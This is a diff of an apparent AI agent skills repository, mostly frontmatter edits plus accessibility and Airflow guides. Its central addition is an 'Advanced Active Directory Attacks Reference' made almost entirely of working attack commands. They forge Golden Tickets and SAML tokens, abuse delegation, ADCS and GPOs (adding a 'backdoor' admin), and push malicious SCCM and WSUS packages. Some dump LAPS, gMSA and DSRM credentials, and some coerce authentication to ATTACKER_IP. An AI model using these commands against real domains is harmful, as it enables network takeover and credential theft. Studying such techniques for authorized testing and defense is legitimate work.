});
|
||||
});
|
||||
|
||||
return { forms, issues };
|
||||
}
|
||||
}
|
||||
|
||||
// ARIA patterns
|
||||
const ariaPatterns = {
|
||||
modal: `
|
||||
<div role="dialog" aria-labelledby="modal-title" aria-modal="true">
|
||||
<h2 id="modal-title">Modal Title</h2>
|
||||
<button aria-label="Close">×</button>
|
||||
</div>`,
|
||||
|
||||
tabs: `
|
||||
<div role="tablist" aria-label="Navigation">
|
||||
<button role="tab" aria-selected="true" aria-controls="panel-1">Tab 1</button>
|
||||
</div>
|
||||
<div role="tabpanel" id="panel-1" aria-labelledby="tab-1">Content</div>`,
|
||||
|
||||
form: `
|
||||
<label for="name">Name <span aria-label="required">*</span></label>
|
||||
<input id="name" required aria-required="true" aria-describedby="name-error">
|
||||
<span id="name-error" role="alert" aria-live="polite"></span>`,
|
||||
};
|
||||
```
|
||||
|
||||
### 5. Manual Testing Checklist
|
||||
|
||||
```markdown
|
||||
## Manual Accessibility Testing
|
||||
|
||||
### Keyboard Navigation
|
||||
|
||||
- [ ] All interactive elements accessible via Tab
|
||||
- [ ] Buttons activate with Enter/Space
|
||||
- [ ] Esc key closes modals
|
||||
- [ ] Focus indicator always visible
|
||||
- [ ] No keyboard traps
|
||||
- [ ] Logical tab order
|
||||
|
||||
### Screen Reader
|
||||
|
||||
- [ ] Page title descriptive
|
||||
- [ ] Headings create logical outline
|
||||
- [ ] Images have alt text
|
||||
- [ ] Form fields have labels
|
||||
- [ ] Error messages announced
|
||||
- [ ] Dynamic updates announced
|
||||
|
||||
### Visual
|
||||
|
||||
- [ ] Text resizes to 200% without loss
|
||||
- [ ] Color not sole means of info
|
||||
- [ ] Focus indicators have sufficient contrast
|
||||
- [ ] Content reflows at 320px
|
||||
- [ ] Animations can be paused
|
||||
|
||||
### Cognitive
|
||||
|
||||
- [ ] Instructions clear and simple
|
||||
- [ ] Error messages helpful
|
||||
- [ ] No time limits on forms
|
||||
- [ ] Navigation consistent
|
||||
- [ ] Important actions reversible
|
||||
```
|
||||
|
||||
### 6. Remediation Examples
|
||||
|
||||
```javascript
|
||||
// Fix missing alt text
|
||||
document.querySelectorAll("img:not([alt])").forEach((img) => {
|
||||
const isDecorative =
|
||||
img.role === "presentation" || img.closest('[role="presentation"]');
|
||||
img.setAttribute("alt", isDecorative ? "" : img.title || "Image");
|
||||
});
|
||||
|
||||
// Fix missing labels
|
||||
document
|
||||
.querySelectorAll("input:not([aria-label]):not([id])")
|
||||
.forEach((input) => {
|
||||
if (input.placeholder) {
|
||||
input.setAttribute("aria-label", input.placeholder);
|
||||
}
|
||||
});
|
||||
|
||||
// React accessible components
|
||||
const AccessibleButton = ({ children, onClick, ariaLabel, ...props }) => (
|
||||
<button onClick={onClick} aria-label={ariaLabel} {...props}>
|
||||
{children}
|
||||
</button>
|
||||
);
|
||||
|
||||
const LiveRegion = ({ message, politeness = "polite" }) => (
|
||||
<div
|
||||
role="status"
|
||||
aria-live={politeness}
|
||||
aria-atomic="true"
|
||||
className="sr-only"
|
||||
>
|
||||
{message}
|
||||
</div>
|
||||
);
|
||||
```
|
||||
|
||||
### 7. CI/CD Integration
|
||||
|
||||
```yaml
|
||||
# .github/workflows/accessibility.yml
|
||||
name: Accessibility Tests
|
||||
|
||||
on: [push, pull_request]
|
||||
|
||||
jobs:
|
||||
a11y-tests:
|
||||
runs-on: ubuntu-latest
|
||||
|
||||
steps:
|
||||
- uses: actions/checkout@v3
|
||||
|
||||
- name: Setup Node.js
|
||||
uses: actions/setup-node@v3
|
||||
with:
|
||||
node-version: "18"
|
||||
|
||||
- name: Install and build
|
||||
run: |
|
||||
npm ci
|
||||
npm run build
|
||||
|
||||
- name: Start server
|
||||
run: |
|
||||
npm start &
|
||||
npx wait-on http://localhost:3000
|
||||
|
||||
- name: Run axe tests
|
||||
run: npm run test:a11y
|
||||
|
||||
- name: Run pa11y
|
||||
run: npx pa11y http://localhost:3000 --standard WCAG2AA --threshold 0
|
||||
|
||||
- name: Upload report
|
||||
uses: actions/upload-artifact@v3
|
||||
if: always()
|
||||
with:
|
||||
name: a11y-report
|
||||
path: a11y-report.html
|
||||
```
|
||||
|
||||
### 8. Reporting
|
||||
|
||||
```javascript
|
||||
// report-generator.js
|
||||
class AccessibilityReportGenerator {
|
||||
generateHTMLReport(auditResults) {
|
||||
return `
|
||||
<!DOCTYPE html>
|
||||
<html lang="en">
|
||||
<head>
|
||||
<title>Accessibility Audit</title>
|
||||
<style>
|
||||
body { font-family: Arial, sans-serif; margin: 20px; }
|
||||
.summary { background: #f0f0f0; padding: 20px; border-radius: 8px; }
|
||||
.score { font-size: 48px; font-weight: bold; }
|
||||
.violation { margin: 20px 0; padding: 15px; border: 1px solid #ddd; }
|
||||
.critical { border-color: #f00; background: #fee; }
|
||||
.serious { border-color: #fa0; background: #ffe; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<h1>Accessibility Audit Report</h1>
|
||||
<p>Generated: ${new Date().toLocaleString()}</p>
|
||||
|
||||
<div class="summary">
|
||||
<h2>Summary</h2>
|
||||
<div class="score">${auditResults.score}/100</div>
|
||||
<p>Total Violations: ${auditResults.violations.length}</p>
|
||||
</div>
|
||||
|
||||
<h2>Violations</h2>
|
||||
${auditResults.violations
|
||||
.map(
|
||||
(v) => `
|
||||
<div class="violation ${v.impact}">
|
||||
<h3>${v.help}</h3>
|
||||
<p><strong>Impact:</strong> ${v.impact}</p>
|
||||
<p>${v.description}</p>
|
||||
<a href="${v.helpUrl}">Learn more</a>
|
||||
</div>
|
||||
`,
|
||||
)
|
||||
.join("")}
|
||||
</body>
|
||||
</html>`;
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Output Format
|
||||
|
||||
1. **Accessibility Score**: Overall compliance with WCAG levels
|
||||
2. **Violation Report**: Detailed issues with severity and fixes
|
||||
3. **Test Results**: Automated and manual test outcomes
|
||||
4. **Remediation Guide**: Step-by-step fixes for each issue
|
||||
5. **Code Examples**: Accessible component implementations
|
||||
|
||||
Focus on creating inclusive experiences that work for all users, regardless of their abilities or assistive technologies.
|
||||
@@ -1,11 +1,9 @@
|
||||
---
|
||||
name: active-directory-attacks
|
||||
description: "This skill should be used when the user asks to \"attack Active Directory\", \"exploit AD\", \"Kerberoasting\", \"DCSync\", \"pass-the-hash\", \"BloodHound enumeration\", \"Golden Ticket\", ..."
|
||||
metadata:
|
||||
author: zebbern
|
||||
version: "1.1"
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Active Directory Attacks
|
||||
|
||||
@@ -0,0 +1,382 @@
|
||||
# Advanced Active Directory Attacks Reference
|
||||
|
||||
## Table of Contents
|
||||
1. [Delegation Attacks](#delegation-attacks)
|
||||
2. [Group Policy Object Abuse](#group-policy-object-abuse)
|
||||
3. [RODC Attacks](#rodc-attacks)
|
||||
4. [SCCM/WSUS Deployment](#sccmwsus-deployment)
|
||||
5. [AD Certificate Services (ADCS)](#ad-certificate-services-adcs)
|
||||
6. [Trust Relationship Attacks](#trust-relationship-attacks)
|
||||
7. [ADFS Golden SAML](#adfs-golden-saml)
|
||||
8. [Credential Sources](#credential-sources)
|
||||
9. [Linux AD Integration](#linux-ad-integration)
|
||||
|
||||
---
|
||||
|
||||
## Delegation Attacks
|
||||
|
||||
### Unconstrained Delegation
|
||||
|
||||
When a user authenticates to a computer with unconstrained delegation, their TGT is saved to memory.
|
||||
|
||||
**Find Delegation:**
|
||||
```powershell
|
||||
# PowerShell
|
||||
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
|
||||
|
||||
# BloodHound
|
||||
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
|
||||
```
|
||||
|
||||
**SpoolService Abuse:**
|
||||
```bash
|
||||
# Check spooler service
|
||||
ls \\dc01\pipe\spoolss
|
||||
|
||||
# Trigger with SpoolSample
|
||||
.\SpoolSample.exe DC01.domain.local HELPDESK.domain.local
|
||||
|
||||
# Or with printerbug.py
|
||||
python3 printerbug.py 'domain/user:pass'@DC01 ATTACKER_IP
|
||||
```
|
||||
|
||||
**Monitor with Rubeus:**
|
||||
```powershell
|
||||
Rubeus.exe monitor /interval:1
|
||||
```
|
||||
|
||||
### Constrained Delegation
|
||||
|
||||
**Identify:**
|
||||
```powershell
|
||||
Get-DomainComputer -TrustedToAuth | select -exp msds-AllowedToDelegateTo
|
||||
```
|
||||
|
||||
**Exploit with Rubeus:**
|
||||
```powershell
|
||||
# S4U2 attack
|
||||
Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
|
||||
```
|
||||
|
||||
**Exploit with Impacket:**
|
||||
```bash
|
||||
getST.py -spn HOST/target.domain.local 'domain/user:password' -impersonate Administrator -dc-ip DC_IP
|
||||
```
|
||||
|
||||
### Resource-Based Constrained Delegation (RBCD)
|
||||
|
||||
```powershell
|
||||
# Create machine account
|
||||
New-MachineAccount -MachineAccount AttackerPC -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
|
||||
|
||||
# Set delegation
|
||||
Set-ADComputer target -PrincipalsAllowedToDelegateToAccount AttackerPC$
|
||||
|
||||
# Get ticket
|
||||
.\Rubeus.exe s4u /user:AttackerPC$ /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Group Policy Object Abuse
|
||||
|
||||
### Find Vulnerable GPOs
|
||||
|
||||
```powershell
|
||||
Get-DomainObjectAcl -Identity "SuperSecureGPO" -ResolveGUIDs | Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|WriteDacl|WriteOwner")}
|
||||
```
|
||||
|
||||
### Abuse with SharpGPOAbuse
|
||||
|
||||
```powershell
|
||||
# Add local admin
|
||||
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount attacker --GPOName "Vulnerable GPO"
|
||||
|
||||
# Add user rights
|
||||
.\SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount attacker --GPOName "Vulnerable GPO"
|
||||
|
||||
# Add immediate task
|
||||
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c net user backdoor Password123! /add" --GPOName "Vulnerable GPO"
|
||||
```
|
||||
|
||||
### Abuse with pyGPOAbuse (Linux)
|
||||
|
||||
```bash
|
||||
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## RODC Attacks
|
||||
|
||||
### RODC Golden Ticket
|
||||
|
||||
RODCs contain filtered AD copy (excludes LAPS/Bitlocker keys). Forge tickets for principals in msDS-RevealOnDemandGroup.
|
||||
|
||||
### RODC Key List Attack
|
||||
|
||||
**Requirements:**
|
||||
- krbtgt credentials of the RODC (-rodcKey)
|
||||
- ID of the krbtgt account of the RODC (-rodcNo)
|
||||
|
||||
```bash
|
||||
# Impacket keylistattack
|
||||
keylistattack.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -full
|
||||
|
||||
# Using secretsdump with keylist
|
||||
secretsdump.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -use-keylist
|
||||
```
|
||||
|
||||
**Using Rubeus:**
|
||||
```powershell
|
||||
Rubeus.exe golden /rodcNumber:25078 /aes256:RODC_AES256_KEY /user:Administrator /id:500 /domain:domain.local /sid:S-1-5-21-xxx
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## SCCM/WSUS Deployment
|
||||
|
||||
### SCCM Attack with MalSCCM
|
||||
|
||||
```bash
|
||||
# Locate SCCM server
|
||||
MalSCCM.exe locate
|
||||
|
||||
# Enumerate targets
|
||||
MalSCCM.exe inspect /all
|
||||
MalSCCM.exe inspect /computers
|
||||
|
||||
# Create target group
|
||||
MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device
|
||||
MalSCCM.exe group /addhost /groupname:TargetGroup /host:TARGET-PC
|
||||
|
||||
# Create malicious app
|
||||
MalSCCM.exe app /create /name:backdoor /uncpath:"\\SCCM\SCCMContentLib$\evil.exe"
|
||||
|
||||
# Deploy
|
||||
MalSCCM.exe app /deploy /name:backdoor /groupname:TargetGroup /assignmentname:update
|
||||
|
||||
# Force checkin
|
||||
MalSCCM.exe checkin /groupname:TargetGroup
|
||||
|
||||
# Cleanup
|
||||
MalSCCM.exe app /cleanup /name:backdoor
|
||||
MalSCCM.exe group /delete /groupname:TargetGroup
|
||||
```
|
||||
|
||||
### SCCM Network Access Accounts
|
||||
|
||||
```powershell
|
||||
# Find SCCM blob
|
||||
Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
|
||||
|
||||
# Decrypt with SharpSCCM
|
||||
.\SharpSCCM.exe get naa -u USERNAME -p PASSWORD
|
||||
```
|
||||
|
||||
### WSUS Deployment Attack
|
||||
|
||||
```bash
|
||||
# Using SharpWSUS
|
||||
SharpWSUS.exe locate
|
||||
SharpWSUS.exe inspect
|
||||
|
||||
# Create malicious update
|
||||
SharpWSUS.exe create /payload:"C:\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user backdoor Password123! /add\"" /title:"Critical Update"
|
||||
|
||||
# Deploy to target
|
||||
SharpWSUS.exe approve /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group"
|
||||
|
||||
# Check status
|
||||
SharpWSUS.exe check /updateid:GUID /computername:TARGET.domain.local
|
||||
|
||||
# Cleanup
|
||||
SharpWSUS.exe delete /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## AD Certificate Services (ADCS)
|
||||
|
||||
### ESC1 - Misconfigured Templates
|
||||
|
||||
Template allows ENROLLEE_SUPPLIES_SUBJECT with Client Authentication EKU.
|
||||
|
||||
```bash
|
||||
# Find vulnerable templates
|
||||
certipy find -u user@domain.local -p password -dc-ip DC_IP -vulnerable
|
||||
|
||||
# Request certificate as admin
|
||||
certipy req -u user@domain.local -p password -ca CA-NAME -target ca.domain.local -template VulnTemplate -upn administrator@domain.local
|
||||
|
||||
# Authenticate
|
||||
certipy auth -pfx administrator.pfx -dc-ip DC_IP
|
||||
```
|
||||
|
||||
### ESC4 - ACL Vulnerabilities
|
||||
|
||||
```python
|
||||
# Check for WriteProperty
|
||||
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -get-acl
|
||||
|
||||
# Add ENROLLEE_SUPPLIES_SUBJECT flag
|
||||
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -add CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
|
||||
|
||||
# Perform ESC1, then restore
|
||||
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -value 0 -property mspki-Certificate-Name-Flag
|
||||
```
|
||||
|
||||
### ESC8 - NTLM Relay to Web Enrollment
|
||||
|
||||
```bash
|
||||
# Start relay
|
||||
ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
|
||||
|
||||
# Coerce authentication
|
||||
python3 petitpotam.py ATTACKER_IP DC_IP
|
||||
|
||||
# Use certificate
|
||||
Rubeus.exe asktgt /user:DC$ /certificate:BASE64_CERT /ptt
|
||||
```
|
||||
|
||||
### Shadow Credentials
|
||||
|
||||
```bash
|
||||
# Add Key Credential (pyWhisker)
|
||||
python3 pywhisker.py -d "domain.local" -u "user1" -p "password" --target "TARGET" --action add
|
||||
|
||||
# Get TGT with PKINIT
|
||||
python3 gettgtpkinit.py -cert-pfx "cert.pfx" -pfx-pass "password" "domain.local/TARGET" target.ccache
|
||||
|
||||
# Get NT hash
|
||||
export KRB5CCNAME=target.ccache
|
||||
python3 getnthash.py -key 'AS-REP_KEY' domain.local/TARGET
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Trust Relationship Attacks
|
||||
|
||||
### Child to Parent Domain (SID History)
|
||||
|
||||
```powershell
|
||||
# Get Enterprise Admins SID from parent
|
||||
$ParentSID = "S-1-5-21-PARENT-DOMAIN-SID-519"
|
||||
|
||||
# Create Golden Ticket with SID History
|
||||
kerberos::golden /user:Administrator /domain:child.parent.local /sid:S-1-5-21-CHILD-SID /krbtgt:KRBTGT_HASH /sids:$ParentSID /ptt
|
||||
```
|
||||
|
||||
### Forest to Forest (Trust Ticket)
|
||||
|
||||
```bash
|
||||
# Dump trust key
|
||||
lsadump::trust /patch
|
||||
|
||||
# Forge inter-realm TGT
|
||||
kerberos::golden /domain:domain.local /sid:S-1-5-21-xxx /rc4:TRUST_KEY /user:Administrator /service:krbtgt /target:external.com /ticket:trust.kirbi
|
||||
|
||||
# Use trust ticket
|
||||
.\Rubeus.exe asktgs /ticket:trust.kirbi /service:cifs/target.external.com /dc:dc.external.com /ptt
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## ADFS Golden SAML
|
||||
|
||||
**Requirements:**
|
||||
- ADFS service account access
|
||||
- Token signing certificate (PFX + decryption password)
|
||||
|
||||
```bash
|
||||
# Dump with ADFSDump
|
||||
.\ADFSDump.exe
|
||||
|
||||
# Forge SAML token
|
||||
python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.domain.local saml2 --endpoint https://target/saml --nameid administrator@domain.local
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Credential Sources
|
||||
|
||||
### LAPS Password
|
||||
|
||||
```powershell
|
||||
# PowerShell
|
||||
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
|
||||
|
||||
# CrackMapExec
|
||||
crackmapexec ldap DC_IP -u user -p password -M laps
|
||||
```
|
||||
|
||||
### GMSA Password
|
||||
|
||||
```powershell
|
||||
# PowerShell + DSInternals
|
||||
$gmsa = Get-ADServiceAccount -Identity 'SVC_ACCOUNT' -Properties 'msDS-ManagedPassword'
|
||||
$mp = $gmsa.'msDS-ManagedPassword'
|
||||
ConvertFrom-ADManagedPasswordBlob $mp
|
||||
```
|
||||
|
||||
```bash
|
||||
# Linux with bloodyAD
|
||||
python bloodyAD.py -u user -p password --host DC_IP getObjectAttributes gmsaAccount$ msDS-ManagedPassword
|
||||
```
|
||||
|
||||
### Group Policy Preferences (GPP)
|
||||
|
||||
```bash
|
||||
# Find in SYSVOL
|
||||
findstr /S /I cpassword \\domain.local\sysvol\domain.local\policies\*.xml
|
||||
|
||||
# Decrypt
|
||||
python3 Get-GPPPassword.py -no-pass 'DC_IP'
|
||||
```
|
||||
|
||||
### DSRM Credentials
|
||||
|
||||
```powershell
|
||||
# Dump DSRM hash
|
||||
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
|
||||
|
||||
# Enable DSRM admin logon
|
||||
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Linux AD Integration
|
||||
|
||||
### CCACHE Ticket Reuse
|
||||
|
||||
```bash
|
||||
# Find tickets
|
||||
ls /tmp/ | grep krb5cc
|
||||
|
||||
# Use ticket
|
||||
export KRB5CCNAME=/tmp/krb5cc_1000
|
||||
```
|
||||
|
||||
### Extract from Keytab
|
||||
|
||||
```bash
|
||||
# List keys
|
||||
klist -k /etc/krb5.keytab
|
||||
|
||||
# Extract with KeyTabExtract
|
||||
python3 keytabextract.py /etc/krb5.keytab
|
||||
```
|
||||
|
||||
### Extract from SSSD
|
||||
|
||||
```bash
|
||||
# Database location
|
||||
/var/lib/sss/secrets/secrets.ldb
|
||||
|
||||
# Key location
|
||||
/var/lib/sss/secrets/.secrets.mkey
|
||||
|
||||
# Extract
|
||||
python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey
|
||||
```
|
||||
@@ -1,10 +1,9 @@
|
||||
---
|
||||
name: activecampaign-automation
|
||||
description: "Automate ActiveCampaign tasks via Rube MCP (Composio): manage contacts, tags, list subscriptions, automation enrollment, and tasks. Always search tools first for current schemas."
|
||||
requires:
|
||||
mcp: [rube]
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# ActiveCampaign Automation via Rube MCP
|
||||
|
||||
@@ -3,6 +3,7 @@ name: address-github-comments
|
||||
description: "Use when you need to address review or issue comments on an open GitHub Pull Request using the gh CLI."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Address GitHub Comments
|
||||
|
||||
@@ -1,8 +1,9 @@
|
||||
---
|
||||
name: agent-evaluation
|
||||
description: "Testing and benchmarking LLM agents including behavioral testing, capability assessment, reliability metrics, and production monitoring\u2014where even top agents achieve less than 50% on re..."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
risk: unknown
|
||||
source: "vibeship-spawner-skills (Apache 2.0)"
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Agent Evaluation
|
||||
|
||||
@@ -1,9 +1,9 @@
|
||||
---
|
||||
name: agent-framework-azure-ai-py
|
||||
description: "Build Azure AI Foundry agents using the Microsoft Agent Framework Python SDK (agent-framework-azure-ai). Use when creating persistent agents with AzureAIAgentsProvider, using hosted tools (code int..."
|
||||
package: agent-framework-azure-ai
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Agent Framework Azure Hosted Agents
|
||||
|
||||
@@ -3,6 +3,7 @@ name: agent-manager-skill
|
||||
description: "Manage multiple local CLI agents via tmux sessions (start/stop/monitor/assign) with cron-friendly scheduling."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Agent Manager Skill
|
||||
|
||||
@@ -1,9 +1,9 @@
|
||||
---
|
||||
name: agent-memory-mcp
|
||||
author: Amit Rathiesh
|
||||
description: "A hybrid memory system that provides persistent, searchable knowledge management for AI agents (Architecture, Patterns, Decisions)."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Agent Memory Skill
|
||||
|
||||
@@ -1,8 +1,9 @@
|
||||
---
|
||||
name: agent-memory-systems
|
||||
description: "Memory is the cornerstone of intelligent agents. Without it, every interaction starts from zero. This skill covers the architecture of agent memory: short-term (context window), long-term (vector s..."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
risk: unknown
|
||||
source: "vibeship-spawner-skills (Apache 2.0)"
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Agent Memory Systems
|
||||
|
||||
@@ -3,6 +3,7 @@ name: agent-orchestration-improve-agent
|
||||
description: "Systematic improvement of existing agents through performance analysis, prompt engineering, and continuous iteration."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Agent Performance Optimization Workflow
|
||||
|
||||
@@ -3,6 +3,7 @@ name: agent-orchestration-multi-agent-optimize
|
||||
description: "Optimize multi-agent systems with coordinated profiling, workload distribution, and cost-aware orchestration. Use when improving agent performance, throughput, or reliability."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Multi-Agent Optimization Toolkit
|
||||
|
||||
@@ -1,8 +1,9 @@
|
||||
---
|
||||
name: agent-tool-builder
|
||||
description: "Tools are how AI agents interact with the world. A well-designed tool is the difference between an agent that works and one that hallucinates, fails silently, or costs 10x more tokens than necessar..."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
risk: unknown
|
||||
source: "vibeship-spawner-skills (Apache 2.0)"
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Agent Tool Builder
|
||||
|
||||
@@ -1,8 +1,9 @@
|
||||
---
|
||||
name: agentfolio
|
||||
description: "Skill for discovering and researching autonomous AI agents, tools, and ecosystems using the AgentFolio directory."
|
||||
source: agentfolio.io
|
||||
risk: unknown
|
||||
source: agentfolio.io
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# AgentFolio
|
||||
|
||||
@@ -1,9 +1,9 @@
|
||||
---
|
||||
name: agents-v2-py
|
||||
description: "Build container-based Foundry Agents with Azure AI Projects SDK (ImageBasedHostedAgentDefinition). Use when creating hosted agents with custom container images in Azure AI Foundry."
|
||||
package: azure-ai-projects
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Azure AI Hosted Agents (Python)
|
||||
|
||||
@@ -1,11 +1,10 @@
|
||||
---
|
||||
name: ai-agent-development
|
||||
description: "AI agent development workflow for building autonomous agents, multi-agent systems, and agent orchestration with CrewAI, LangGraph, and custom agents."
|
||||
source: personal
|
||||
risk: safe
|
||||
domain: ai-ml
|
||||
category: granular-workflow-bundle
|
||||
version: 1.0.0
|
||||
risk: safe
|
||||
source: personal
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# AI Agent Development Workflow
|
||||
|
||||
@@ -1,8 +1,9 @@
|
||||
---
|
||||
name: ai-agents-architect
|
||||
description: "Expert in designing and building autonomous AI agents. Masters tool use, memory systems, planning strategies, and multi-agent orchestration. Use when: build agent, AI agent, autonomous agent, tool ..."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
risk: unknown
|
||||
source: "vibeship-spawner-skills (Apache 2.0)"
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# AI Agents Architect
|
||||
|
||||
@@ -1,14 +1,9 @@
|
||||
---
|
||||
name: ai-engineer
|
||||
description: |
|
||||
Build production-ready LLM applications, advanced RAG systems, and
|
||||
intelligent agents. Implements vector search, multimodal AI, agent
|
||||
orchestration, and enterprise AI integrations. Use PROACTIVELY for LLM
|
||||
features, chatbots, AI agents, or AI-powered applications.
|
||||
metadata:
|
||||
model: inherit
|
||||
description: Build production-ready LLM applications, advanced RAG systems, and intelligent agents. Implements vector search, multimodal AI, agent orchestration, and enterprise AI integrations.
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: '2026-02-27'
|
||||
---
|
||||
|
||||
You are an AI engineer specializing in production-grade LLM applications, generative AI systems, and intelligent agent architectures.
|
||||
|
||||
@@ -1,11 +1,10 @@
|
||||
---
|
||||
name: ai-ml
|
||||
description: "AI and machine learning workflow covering LLM application development, RAG implementation, agent architecture, ML pipelines, and AI-powered features."
|
||||
source: personal
|
||||
risk: safe
|
||||
domain: artificial-intelligence
|
||||
category: workflow-bundle
|
||||
version: 1.0.0
|
||||
risk: safe
|
||||
source: personal
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# AI/ML Workflow Bundle
|
||||
|
||||
@@ -1,8 +1,9 @@
|
||||
---
|
||||
name: ai-product
|
||||
description: "Every product will be AI-powered. The question is whether you'll build it right or ship a demo that falls apart in production. This skill covers LLM integration patterns, RAG architecture, prompt ..."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
description: Every product will be AI-powered. The question is whether you'll build it right or ship a demo that falls apart in production. This skill covers LLM integration patterns, RAG architecture, prompt ...
|
||||
risk: unknown
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
date_added: '2026-02-27'
|
||||
---
|
||||
|
||||
# AI Product Development
|
||||
|
||||
@@ -1,8 +1,9 @@
|
||||
---
|
||||
name: ai-wrapper-product
|
||||
description: "Expert in building products that wrap AI APIs (OpenAI, Anthropic, etc.) into focused tools people will pay for. Not just 'ChatGPT but different' - products that solve specific problems with AI. Cov..."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
risk: unknown
|
||||
source: "vibeship-spawner-skills (Apache 2.0)"
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# AI Wrapper Product
|
||||
|
||||
@@ -3,6 +3,7 @@ name: airflow-dag-patterns
|
||||
description: "Build production Apache Airflow DAGs with best practices for operators, sensors, testing, and deployment. Use when creating data pipelines, orchestrating workflows, or scheduling batch jobs."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Apache Airflow DAG Patterns
|
||||
|
||||
@@ -0,0 +1,509 @@
|
||||
# Apache Airflow DAG Patterns Implementation Playbook
|
||||
|
||||
This file contains detailed patterns, checklists, and code samples referenced by the skill.
|
||||
|
||||
## Core Concepts
|
||||
|
||||
### 1. DAG Design Principles
|
||||
|
||||
| Principle | Description |
|
||||
|-----------|-------------|
|
||||
| **Idempotent** | Running twice produces same result |
|
||||
| **Atomic** | Tasks succeed or fail completely |
|
||||
| **Incremental** | Process only new/changed data |
|
||||
| **Observable** | Logs, metrics, alerts at every step |
|
||||
|
||||
### 2. Task Dependencies
|
||||
|
||||
```python
|
||||
# Linear
|
||||
task1 >> task2 >> task3
|
||||
|
||||
# Fan-out
|
||||
task1 >> [task2, task3, task4]
|
||||
|
||||
# Fan-in
|
||||
[task1, task2, task3] >> task4
|
||||
|
||||
# Complex
|
||||
task1 >> task2 >> task4
|
||||
task1 >> task3 >> task4
|
||||
```
|
||||
|
||||
## Quick Start
|
||||
|
||||
```python
|
||||
# dags/example_dag.py
|
||||
from datetime import datetime, timedelta
|
||||
from airflow import DAG
|
||||
from airflow.operators.python import PythonOperator
|
||||
from airflow.operators.empty import EmptyOperator
|
||||
|
||||
default_args = {
|
||||
'owner': 'data-team',
|
||||
'depends_on_past': False,
|
||||
'email_on_failure': True,
